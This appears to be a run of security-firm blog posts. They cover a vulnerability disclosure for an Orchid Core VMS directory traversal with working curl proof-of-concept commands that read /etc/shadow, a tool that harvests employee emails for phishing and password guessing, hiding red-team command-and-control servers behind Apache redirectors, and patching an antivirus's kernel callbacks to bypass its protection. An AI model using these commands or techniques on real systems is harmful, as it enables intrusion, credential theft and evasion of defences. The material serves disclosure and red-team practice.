CVE-2018-10956: Unauthenticated Privileged Directory Traversal in IPConfigure Orchid Core VMS

Affected Software: IPConfigure Orchid Core VMS (All versions < 2.0.6, tested on Linux and Windows)

Vulnerability: Unauthenticated Privileged Directory Traversal

CVE: CVE-2018-10956

Impact: Arbitrary File Read Access

Metasploit module:

https://github.com/nettitude/metasploit-modules/blob/master/orchid_core_vms_directory_traversal.rb

Summary of Vulnerability

IPConfigure Orchid Core VMS is a Video Management System that is vulnerable to a directory traversal attack, which allows underlying database access, access to camera feeds and more. This allows a remote, unauthenticated attacker to send crafted GET requests to the application, which results in the ability to read arbitrary files outside of the applications web directory. This issue is further compounded as the Linux version of Orchid Core VMS application is running in context of a user in the “sudoers” group. As such, any file on the underlying system, for which the location is known, can be read.

Nettitude has performed limited testing on the Windows version of Orchid Core VMS, and has been able to read files such as ‘C:/Windows/debug/NetSetup.log’ and ‘C:/WINDOWS/System32/drivers/etc/hosts’. Reading these files does not require permissions greater than a regular user account, however, it is possible that the Orchid Core VMS web server is running in a privileged context.

Below is an image for the login page of Orchid Core VMS.

Metasploit Module

We have created a Metasploit module for this vulnerability, which can be found here:

Vulnerability Analysis and Impact

Discovery of the vulnerability involved multiple steps, such as identifying the correct URL encoding that is accepted by the application, as well as the location of files on the underlying system, the latter of which was conducted through manual and automated fuzzing techniques.

The following images will help explain the discovery and exploitation of this vulnerability. This is the first GET request that was sent through a browser.

Request: https://ip/../../../../../../../etc/shadow

The response is interesting as the error suggests that it may be possible to read resources on the underlying web server. In this request it appears that the dot-dot-slash ( ../) was removed by the application. As such, in the second request, the dot-dot-slash was URL encoded and once again submitted through the browser.

Request: https://ip/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/shadow

In this request, the URL encoding for the forward slash ( %2e) was removed. Nettitude submitted a third request, the browser was bypassed and the same request was sent to the web server using curl.

The following image demonstrates the ability to read the ‘/etc/shadow’ file on a Linux file system. This is of particular concern as it displays that the Orchid web service is running with high user privileges. With this level of access an attacker is in the position to read certain files of interest. This includes SSH private keys, VPN configuration files and all other files on the underlying system.

The following image demonstrates the ability to read the ‘C:\Windows\debug\NetSetup.log’ file on a Windows file system. This demonstrates that the vulnerability is not limited to the Linux file system and affects both Windows and Linux operating systems.

Furthermore, Nettitude was able to identify the applications structure and database location using readily available developer documentation and the online knowledge base for Orchid Core VMS (https://support.ipconfigure.com/hc/en-us/categories/200146489-Orchid-Core-VMS).

Orchid Core VMS uses a SQLite database, which is intended to be treated as a file on modern operating systems. Nettitude was able to download this database using the previously described directory traversal vulnerability. The image below represents the users which have access to the application, along with their SHA1 16-byte salted password hashes. Upon successfully cracking password hashes and obtaining the cleartext password for a user account, an attacker is placed in the position to view live-camera streams, manage user accounts and perform other application functions which are otherwise restricted to authenticated users.

Perusing through the database, Nettitude also discovered valid session ID’s for the web application and connected-camera descriptions.

Proof of Concept for Linux

curl --insecure https://IP/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/shadow

Proof of Concept for Windows

curl http://IP:PORT/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/Windows/debug/NetSetup.log

Disclosure Timeline

  • 20 April 2018: Discovered directory traversal vulnerability in Orchid VMS 2.0 on Ubuntu 14.04 LTS.
  • 7 May 2018: Confirmation of vulnerability on other Linux OS and Windows OS across all Orchid VMS versions.
  • 7 May 2018: Initial write up of vulnerability.
  • 7 May 2018: Initial reach out to IPConfigure. Submitted request for contact details for an information security employee.
  • 8 May 2018: Verified that the correct contact has been reached.
  • 9 May 2018: Requested CVE reservation from Mitre.
  • 9 May 2018: Received CVE-2018-10956 from Mitre.
  • 9 May 2018: Sent PGP encrypted vulnerability write up to contact at IPConfigure.
  • 11 May 2018: Received confirmation of vulnerability from IPConfigure.
  • 11 May 2018: IPConfigure releases v2.0.6 for public download, resolving the identified vulnerability.
  • 20 June 2018: Nettitude publicly disclosed the vulnerability

Introducing Prowl

Prowl was initially designed as an in house tool to aid engagements where there’s a requirement to capture email addresses from LinkedIn. Recently, it has been further developed to provide the same initial functionality, plus other features such as matching emails against data breaches, identifying current job openings at the target organisation (handy for targeting recruiters and HR when social engineering), subdomain identification and much more.  It does so without breaching LinkedIn’s Terms of Service. We are formally releasing Prowl to the public today.

Installation

The first step of the installation is to clone the GitHub repository that contains all of the code required by Prowl.

git clone https://github.com/nettitude/prowl

Once you’ve downloaded the script it’s time to update and install all of the required repositories. This can be done by copying and the pasting the following text into your terminal.

Using Prowl

A core objective of Prowl is to keep the tool both simple and independent – it doesn’t require any API keys or cookies in order for it to run.  The minimal amount of information required includes the company name and the format of the organisation’s email addresses. It should be noted that all optional flags can be selected via -a, excluding the proxy.

https://lh6.googleusercontent.com/wJrC2UPkmfH9LUkjCsInMcWcDPg0vfpDXl64ufMeyTRRzxpAuljbU5VL84sdz9PbRHTpXinkIfiSka-eR63CnpTEMWx39TnALsg4EvBrcT6R56_Vcv838Ic1B8kOqk2dNA

As mentioned, the company name needs to be supplied to Prowl. This can be done by adding the -c flag followed but the organisation’s name. If the name has any spaces then it needs to be wrapped with quotation marks, for example “Acme Inc”. Secondary to this, the email format must be supplied via the -e flag, followed by the mark-up and domain.

Examples

  • matthewpickford@nettitude.com  ->  -e "<fn><ln>@nettitude.com"
  • mpickford@nettitude.com  ->  -e "<fi><ln>@nettitude.com"
  • matthewp@nettitude.com  ->  -e "<fn><li>@nettitude.com"
  • mp@nettitude.com  ->  -e "<fi><li>@nettitude.com"

Other characters such as hyphens can be added between the mark-up, for example:

  • matthew-pickford@nettitude.com  ->  -e "<fn>-<ln>@nettitude.com"

Password Identification

An early feature was the identification of email addresses that are found in publicly known password dumps. This is still possible via the ‘HaveIBeenPwned’ API. However, with the latest version of Prowl, instead of displaying this information via STDOUT, the results are stored within the output accounts file by default.

Finding Jobs

It’s a pretty well known fact that recruiters and HR departments are usually a weak link in terms of clicking links and opening documents. It is after all their job to review CVs, so they’re not entirely to blame. To build a rapport with these heavy clickers it can always be useful to know the currently available jobs within the organisation. Prowl can do this by scraping Indeed jobs without needing to supply any extra information; all that is needed is including the -j flag via the arguments.

https://lh6.googleusercontent.com/suXMD5MT4jlSt1z9Smi040UzLC71FKSb0RN-1hM3jT2GkiryadNFmr1lZardxS-658R_ReqpwBQMBnoq6f5Ipl9P0zs9WPc9FFBqxQZ6vXJ8drvWKypZeLT6nzE_PmHw5w

Subdomain Identification

Prowl isn’t only used for social engineering. It can also be useful for password guessing attacks against services such as OWA. The email addresses gathered are only as useful as the services available, so to try and find all IP addresses of the organisation Prowl identifies all registered SSL/TLS certificates for the domain. As seen in the image below, if the hostname doesn’t have an associated IP address then the result is highlighted in red. However, if an IP address is found then it’s highlighted in orange.

https://lh4.googleusercontent.com/bYPwj-3M3cyWrEgQack0GjNE3O2VobGv5VsidszQM0hrGHEC8ZHtYiK_84w-APn_z6rwOjqxWjo72ktMbHxhRdUAQ3S-42_f8WzvSqVTJx-MxSHFoNQX4dqTcYSPnfYX_g

Proxy

A requested feature was the ability to pass the Yahoo searches via a proxy. In the latest version of Prowl, this has been implemented. Using the -p flag followed by the proxy address will forward all Yahoo and Bing requests via the supplied server. If the proxy fails to pass the request, Prowl won’t start making the requests direct and will exit instead. An example:

-p https://127.0.0.1:8080

Output

It’s always been a frustration of mine when you run a tool and forget to supply the output flag. Prowl automatically saves all collected data into a company folder within the output directory; each data source is saved into comma delimited CSV files.

https://lh3.googleusercontent.com/HShRyVHFIeu1vjFz3z8WJ0eLd3_WEzEVWKa6x-OJxfY8lq-NA_0IBS6wH3IaY-L91cdM43aGkuIM2d9drMi3PN-FdbVJPUhz7MrACC21J5WJPT3MhXbCf6vOAqAj5kgPaA

Comparison

As with any on-going project it’s always good to compare it to other tools to see how it performs. The latest iteration of Prowl seems to get the most results with Nettitude as the search criteria. This may sway from organisation to organisation, but from our testing this appears to be a consistent trend.

Tool

Results

Prowl 53
InSpy 35
Harvester 9

Future

From now on, Prowl will be receiving constant updates, predominantly to adapt to changes made to the scrapping source. A potential idea on the horizon is the ability to push the results from Prowl into a database, whether that be locally or on an internal network. A dream for Prowl would be a way of identifying the email format without the need to provide it as a script argument.

If you have any ideas or feature requests, feel free to make a request via GitHub or drop an email to mpickford at nettitude [.] com.

Apache mod_python for red teams

Nettitude’s red team engagements are typically designed to be as highly targeted and as stealthy as possible. For the command and control (C2) infrastructure, this means layering several techniques.

  • We hide all of our C2 infrastructure behind a number of Apache web servers
  • Any traffic to the C2 is checked against an IP whitelist
  • IP addresses that do not match the whitelist are directed to a legitimate site
  • IP addresses matching the white list are filtered, any traffic that does not match our C2 traffic will be directed to the legitimate site
  • Any traffic that does not match those rules is directed to the C2 infrastructure

We have previously used Apache rewrite rules (mod_rewrite) to accomplish all of this, and it works very well to accomplish this goal. However, if you need to do anything more advanced than regular expression matching, rewrite rules are not applicable.

I’ve recently been looking into adding malleable-comms to our private, in-house red team implant, that is; comms which can be changed to look like something else such as Zeus Bot traffic, in a similar way to Cobalt Strike. While doing this, I was playing around with mod_python and it occurred to me that we could replace our mod_rewrite rules with mod_python in order to make them more manageable. This post will give an overview of how that can be achieved.

Some knowledge of Apache and Python is assumed here; you must be able to set up a basic virtual host and understand how to write Python scripts.

Enable Apache Python module

The Python module needs to be enabled on the server, on an Ubuntu installation. The following two commands, executed as root, will achieve this:

Example virtual host setup

For this example there are three virtual hosts; one internet facing which will run the Python code and redirect users to the correct location, a legitimate site and a C2 site. This example should be configured to match your own C2 setup.

Legitimate site

A legitimate looking site that non-whitelisted users will be directed to, running on port 8000.

A test index.html page can be added to the legitimate site directory, for testing purposes

Command and control

For illustration purposes only, here’s a command and control site, running on port 9000. In real life, you would redirect traffic to your real C2 infrastructure.

A test index.html containing the following can be added:

Internet facing virtual host

Finally, an internet facing host, which is bound to port 80. In real life you would want to also run this on port 443 with a valid SSL certificate appropriate to the engagement.

In order to be able to redirect users, we have hooked the PostReadRequestHandler using the PythonPostReadRequestHandler directive. All requests will be directed through this script and can then be redirected appropriately.

Python debug is also turned on using the PythonDebug directive, to allow us to easily see any errors in our scripts.

The handler script

For the handler, it is possible to write a Python class. The first class defined in the file will be instantiated. A class is overkill for this example, so instead a single function will suffice, which should be called postreadrequesthandler.

In this example, we will redirect curl clients to the C2 server and anyone else to the legitimate site. Log entries will be placed into the Apache error.log file.

The documentation for mod_python is quite sparse, so in order to work out how to perform a redirect correctly, I had to refer to both the mod_proxy and mod_rewrite source code. After some experimentation I found the correct method:

Once all of this is in place, after restarting the apache2 service you should get the following output from curl:

$ curl localhost:80

Changing the curl user agent will send you to the legitimate site:

$ curl localhost:80 --user-agent "hello"

Log Output

The Apache error log should show some useful output, thanks to mod_python.

Further Reading

Full documentation is available for mod_python here:

http://modpython.org/live/current/doc-html/contents.html

WinDbg: using pykd to dump private symbols

We’ve recently been conducting some reverse engineering and vulnerability analysis on an Anti Virus (AV) product and wanted to attach Rohitab API Monitor to one of the AV’s running processes so that I could log the Windows API function calls in order to better understand how the AV was implemented.

The AV in question was protecting its user mode process by making use of Kernel callbacks in one of the device drivers. The callbacks were registered using the ObRegisterCallbacks function:

This is the post patch guard method of allowing the AV driver to intercept calls to ZwOpenProcess, amongst others, so that access can be denied to the process handle, or the returned handle can be given less access rights etc.

The OB_CALLBACK_REGISTRATION and _OB_OPERATION_REGISTRATION structures are not defined in the Microsoft public symbols, so the WinDbg command x nt!_OB* doesn’t help. Both structures are well documented on MSDN, so after intercepting the function call to ObRegisterCallbacks in WinDbg I started decoding the structures by calculating the offsets and dumping memory addresses.

After a couple of debugging runs, this soon becomes tedious; my heart sank when I thought I might have to write a WinDbg script to automate the process. If you’re like me and you don’t use WinDbg scripts that often then you will know how time consuming it can be to re-learn WinDbg scripting each time you need it.

Then I remembered pykd, a python scripting module for Python, which I had heard about but never tried.

Pykd installation

If you are using the x64 version of WinDbg then you also need to install a 64 bit version of python. I chose the 2.7.x version as I already have some build scripts written for Python 2.7.x. At the time of writing, the latest version was 2.7.14:

Once installed head over to the pykd repository. The home of pykd has recently moved to githomelab.ru:

Download the bootstrapper zip, which contains pykd.dll:

pykd.dll has to be copied into the WinDbg “winext” folder, which for me was in the following location:

  • C:\Program Files\Windows Kits\10\Debuggers\x64\winext

The pykd module need to be added to your Python installation. I used pip from a command prompt to achieve this:

Pykd can then be loaded into WinDbg by using the command .load pykd

Note that the pykd documentation is in Russian, however Google Translate did an excellent job of translating it to English. Documentation can be found here:

Dumping OB_CALLBACK_REGISTRATION using pykd

Pykd allows type information to be dynamically created using the typeInfo class. It is also possible to retrieve existing type information (similar to the dt WinDbg command). Using these two capabilities the _OB_CALLBACK_REGISTRATION structure can be defined:

Using the typeInfo function we can obtain the type information for UNICODE_STRING which is a public symbol:

We can create an instance of a type using the typeVar function which takes parameters typeInfo and address. In pykd an address is simply an integer.

Once we have a typeVar instance, we can dump the information in a similar way to using dt nt!_ _OB_CALLBACK_REGISTRATION <address> (if the symbol was public), by casting to a string. Dumping the data in this way doesn’t recursively dump the information, so the output can be improved by iterating over the OperationRegistration array and individually dumping each item.

The final step is to parse the script command line. I wanted to be able to use a register as a parameter as well as an address, so for this so I did some ghetto input parsing:

The script can be run in WinDbg as follows, using the rcx register as input:

Output

Executing the script, while on a breakpoint at nt!ObRegisterCallbacks gives the following output.

Ideas for enhancing the script

Breakpoint Links

It is possible to output debugger markup language (DML) from pykd. It would be quite simple to emit links from the script that allow breakpoints to be set.  DML is documented here:

The dprintln function takes an additional parameter that specified if DML should be emitted:

Specifying True for the second parameter will output DML.

Patching a ret into the callback functions

Using pykd it is also possible to manipulate memory, so the callback functions could be automatically patched to return immediately, and in fact this is what I did to bypass the process protection implemented by the AV:

Other WinDbg scripting options

If you don’t want to use python/pykd then other options are available. Here are two of the most recent ones.

WinDbg Preview (JavaScript)

The WinDbg preview version available here:

It has an updated modern UI and allows JavaScript to be used for scripting

LINQ Debugger Objects

WinDbg can also be queried with LINQ, if you are familiar with LINQ then this might be a good bet